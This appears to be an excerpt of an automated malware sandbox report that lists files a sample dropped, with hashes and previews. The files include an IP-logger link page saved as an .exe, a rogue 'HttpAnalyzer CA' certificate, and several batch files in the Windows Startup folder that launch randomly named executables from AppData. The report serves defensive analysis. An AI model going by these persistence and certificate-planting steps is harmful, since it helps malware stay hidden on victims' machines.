                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\xKfa5BEne98Q6CDxSSuxDfob.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594861019789154
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Qb2nvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:w2bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:0769572513C30B28FDE9AF98E9B13949
                                                                                                                                                                                                                                                            SHA1:41FB473DC320358B93B7221FABED7CA31669A302
                                                                                                                                                                                                                                                            SHA-256:F8F445EF6E8E3BF02685B83840F74B80FE01706080BE9613A78AC00A768B0505
                                                                                                                                                                                                                                                            SHA-512:8F41634995BCF5B16265BBD38B3027EFA578CB2B1DB18F489E0829FE858D8D9DABB661C6D43C6112E7207CF984CEC4AE61513026AD5CEC1E9F5E2E1EFCC16217
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="jYgOIngVfFmRJ6V6tU8oFQ1JEeyUog6pPo2mv5jN">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D8C5E4A16C2BEA0E36BAA2D018275111FF62FD09

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):812
                                                                                                                                                                                                                                                            Entropy (8bit):7.387752072368675
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:Z6hR2MTR2d7NVM+uAR2CP0M9BHMvf9SJbsb:Z6WH1N2DAR2CP02xVg
                                                                                                                                                                                                                                                            MD5:1C3527F8FE5A24623BDD6AD96BF602FD
                                                                                                                                                                                                                                                            SHA1:BC988AD300CA4D581A7056BF8C342377D72D7C73
                                                                                                                                                                                                                                                            SHA-256:308DE7DA302D3ECF499B6C140B11FB3D9DB0D3B9515D8FA3DD0CE4A65659266C
                                                                                                                                                                                                                                                            SHA-512:5C54B19308985ED63EE59CDA2260B8651A27A79C2864DEBD349092FBACC15AD9D3DF309DBD3699684EBBC2751A8D5A6D8AC4E723C983A6272AE756AC58358D83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:...............l+..6....'Q..b.. ...........0...0...............@5..?W...6.0...*.H........0'1.0...U....EN1.0...U....HttpAnalyzer CA0...140520025318Z..340515025318Z0'1.0...U....EN1.0...U....HttpAnalyzer CA0.."0...*.H.............0............q.EN....a.k.,:..H.L.d1".{q.a..Z$^l3'..\....!..4.9..M..d....3V11,.p...&Q1.^T.c/Q..d.p%...7..rX0...W@...`.{l..|...2r......'X.*.o.8....B...7.k.K.R.I.7..\SL..u.C.(..,.9..sFK.....s....}[...........w.s...&qrr9.....I..Q......a|..,.j.....u.!........#0!0...U.......0....0...U...........0...*.H.................p$.8.u.....:..0.B...F-.!..v.k.......>..)(..L...n..Vs.......Q,?...hE....c.._..W;.U"..b8.Y.!...5..^O....J.:.....{..Ge..^..Z.:?.....!~..0[rb.._4.......+..9QE..b.Z.X.hm....\.ZF.Fa..3sQ.Y...Xed......S.q.. 's....g........71<y..H,*.M1e~.<...x..".j..

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                                                                                            Entropy (8bit):3.974904253270341
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8FzdOTqu4WHoZidAKZdA19ehwiZUklqehGfy+3:8qnirhfy
                                                                                                                                                                                                                                                            MD5:CD33C81F268577EAB891800D36DC06BC
                                                                                                                                                                                                                                                            SHA1:71661EF3B39CD5668B45578C95517A2B1CEC8BB7
                                                                                                                                                                                                                                                            SHA-256:9EE953E8A817C5F6B291E69F792A50E5B07135AC611DD8CE3477A816D4E073BB
                                                                                                                                                                                                                                                            SHA-512:3EAD56604A5CFA77A2C24C2C6E386D85553538005770238E046A0ED6956D339F0C70B40F48654283D0A75797FBE7EA3D6C52BF6835EA417C0DEE3D268DC4C6D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......A\s..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2679
                                                                                                                                                                                                                                                            Entropy (8bit):3.9903311544318245
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8FgdOTqu4WHoZidAKZdA1weh/iZUkAQkqehRfy+2:8bniZ9QEfy
                                                                                                                                                                                                                                                            MD5:261A6C8C507E64ABA04807BA86F96683
                                                                                                                                                                                                                                                            SHA1:E41C882E7E521636852075FD3FC13BD819F38B5A
                                                                                                                                                                                                                                                            SHA-256:E37FFF0DD103B6FD2AE453B3AF7E8025B38B7345CF26018DF45A4CC6E4CE674B
                                                                                                                                                                                                                                                            SHA-512:6981B64ABA3EC413AB4E70F10985EDF2188C447047ACAF53EBC438EBC68A14FBC76ED80291E3D1CEC2A821135E838B9158D9E4E8C889030066725CE656BEAB83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....{.A\s..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2693
                                                                                                                                                                                                                                                            Entropy (8bit):4.002974700483056
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8xvdOTqusHoZidAKZdA14tseh7sFiZUkmgqeh7sHfy+BX:8xYnzpnVfy
                                                                                                                                                                                                                                                            MD5:59928CD1D70E881CBB995C6DFF112FC1
                                                                                                                                                                                                                                                            SHA1:9B5F9359E224C226F731738ACD8F9BE2CD6C1D60
                                                                                                                                                                                                                                                            SHA-256:1B9F53CEC89416EADDE55F6E4C6BE9F18A46F35DF6AD8E85F985EF9B995FF8BA
                                                                                                                                                                                                                                                            SHA-512:B4AC119884C5F7BE15E1A3E78D9E98023A4FBB94030894940045A4680CC05235AB1CF7E51C81A6C176AE51DFBAED9E76776C7D4DA6523A9C8A73905C58C3C782
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                                            Entropy (8bit):3.9861106146128624
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8RgdOTqu4WHoZidAKZdA1vehDiZUkwqehdfy+R:8fni6Pfy
                                                                                                                                                                                                                                                            MD5:806C6C063F08569BBA643F55AC0BEB22
                                                                                                                                                                                                                                                            SHA1:D41AC9076961CF03AFA955B89728937758221C0D
                                                                                                                                                                                                                                                            SHA-256:5E9C8B6CAE6AEC017C079DF78E7DFE2F0985986EE57966FB725E5758C35775EB
                                                                                                                                                                                                                                                            SHA-512:D4FFBF9422BFD81963E7B0A9F7C1832DA88CF54DAE37B8F032EC3559BB81226F7E8CB931F74C23E9EA798B71A6FDA91579EF5F144278BE435CC20686CF5EF3EF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......A\s..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                                            Entropy (8bit):3.977222736777172
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8zdOTqu4WHoZidAKZdA1hehBiZUk1W1qeh7fy+C:80ni69bfy
                                                                                                                                                                                                                                                            MD5:6AC7FAD0B4D1543DE3DD85CB7ED002EB
                                                                                                                                                                                                                                                            SHA1:FD9E81E9D37D8231382921800AE0C6CAB3182EFA
                                                                                                                                                                                                                                                            SHA-256:60DA427031504A04AD3B5D314609ED3E713CAD59675E11FECB19CFFB78146C06
                                                                                                                                                                                                                                                            SHA-512:A6D4F3604FA880EB7661C79F34D0C76F8505882283513FD6F759FCFCD6BD782A091A2E262E4A92B9EFFA8E76087329A225F3C3F158043145E42EFA960122725C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......A\s..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2683
                                                                                                                                                                                                                                                            Entropy (8bit):3.9871905493238455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8ydOTqu4WHoZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVfy+yT+:87niET/TbxWOvTbVfy7T
                                                                                                                                                                                                                                                            MD5:C8F3BFE51A4E5E75593C9CDC6A488385
                                                                                                                                                                                                                                                            SHA1:AC6128D9ADAFEA7A79ACE93855F1583E4D6B0529
                                                                                                                                                                                                                                                            SHA-256:72E467CC5D7F477C465606D731AB68039C61C0693A8EFD2AE5592CDDE21BD06D
                                                                                                                                                                                                                                                            SHA-512:ACFCE293F7D66AE2689466D4E0F19684B86619F609F9EA50F350B18680BD84A5FC57199330DB64CB21048E27D03C72F120BD7E871A419A012E3D42D4D5E020ED
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....7..A\s..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............)......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11FhgNaI9OC9CIBuozAEgUpl.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.88794225995095
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J52LIjCwZAdiF:fE19232LmCwZv
                                                                                                                                                                                                                                                            MD5:A10A0D11E994C44C25769D9B494C0070
                                                                                                                                                                                                                                                            SHA1:F27D20433BAB6A4F38FC47D503D465AF82E7010C
                                                                                                                                                                                                                                                            SHA-256:D57E767DA8582E0FF5A3EBB14BCBFB8EAA6560530DE24D8FB577A13B4B767540
                                                                                                                                                                                                                                                            SHA-512:F8E88D2A9CE295357BF7E5B42ACBFE542832ABD43270F6099AEF9B1FDC599F13F64CD6AC50D788EB1265701B23E58D82661F0ADF57DC08C0A36CC8574D5066D5
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\SNzmN8HQUSehVCgProaZjQEN.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26fF1twXUUy7jGhqLx9vrwoW.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.029372753235096
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5RdsJOy0EFn:fE19237spF
                                                                                                                                                                                                                                                            MD5:2D8804E924622EA8B5824938238D2EDE
                                                                                                                                                                                                                                                            SHA1:EFF0A3494E2E65FCFDE2074F0EFB97F14EB8A2AC
                                                                                                                                                                                                                                                            SHA-256:F9F7124498BDD59F7EBF2AB1501E9A5AA0B9264402934F9DD0E33597E904DE89
                                                                                                                                                                                                                                                            SHA-512:3626DB11529C964BC0844F96E60193E3A7C49F68F8F40AAF5CCB742328C4FC47235D40B7A512A4BC78FE442C2EC1060F5A95680F9E0188CA57FF5583EBDE1181
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.920663603600284
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5dnwcH5LWAEFn:fE1923lNhHs
                                                                                                                                                                                                                                                            MD5:8C1D378D08D4F087E53C1D4F869197E1
                                                                                                                                                                                                                                                            SHA1:CDAC5F362DFFF804E65C48DC5C2FB826CA9005A7
                                                                                                                                                                                                                                                            SHA-256:A577769FC66D6BD2A0E163BE28CBD8E5C0198CBF4CF078692A8CB1B265F7D4B3
                                                                                                                                                                                                                                                            SHA-512:760C2ED1DE41D1F7170B9294757A935EF63D43844EB18DA46226D84EF514356E574079688F45A0C00C0EA33EFD90AB90405F8AE938AB96392C25E10966464097
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\xBWhJ9fAo9Iu3r2QPWYsNC0n.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5wXkSqn4DIUtGScxeGbdZDl0.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.9028762822026195
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5SCR/QKhUhI/VIdX3w:fE1923SCZfQI/gg
                                                                                                                                                                                                                                                            MD5:60E2BFEDE43B6A11CE8E0C4E43976232
                                                                                                                                                                                                                                                            SHA1:7A8114AE9988E4E04F05E73B76C23FF1202ABAA4
                                                                                                                                                                                                                                                            SHA-256:3FFA9EDFD3E3344FA41A37248F3770AE13BDD4AD436D4A9589E40D0B3024EF35
                                                                                                                                                                                                                                                            SHA-512:37EACF02402BC4C1A165C2031A12AD36BB59552F158D5E90A1AA43EBCDA9BEB7DFCF1B31C9F4196B30A0C9BB348E26E571E103F6C648C1E139AE1AE27D4A46CE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\wgtZ5oDAxtz8XmZjy9Pg8rRQ.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.013012081410429
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5wzpZ1Tgqrv:fE1923wFvg6
                                                                                                                                                                                                                                                            MD5:2F6FA4793B0C51CD1F43B0EDC9D4EA1E
                                                                                                                                                                                                                                                            SHA1:34BC6948E20B9442B998762885AD7001E363169B
                                                                                                                                                                                                                                                            SHA-256:8258365971079D7FFA1FA5A94E79A8BC64108C562EF745A6E888713C5CC05CA3
                                                                                                                                                                                                                                                            SHA-512:37AB76CAE534EFCE18DC5123E3EB4DC482917EDCDC101167B81C63FF1F8BE0CE380D43422E608D4E7C952A68089EAC0F0E0A00E1120B5D299D5C4506E36631DD
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
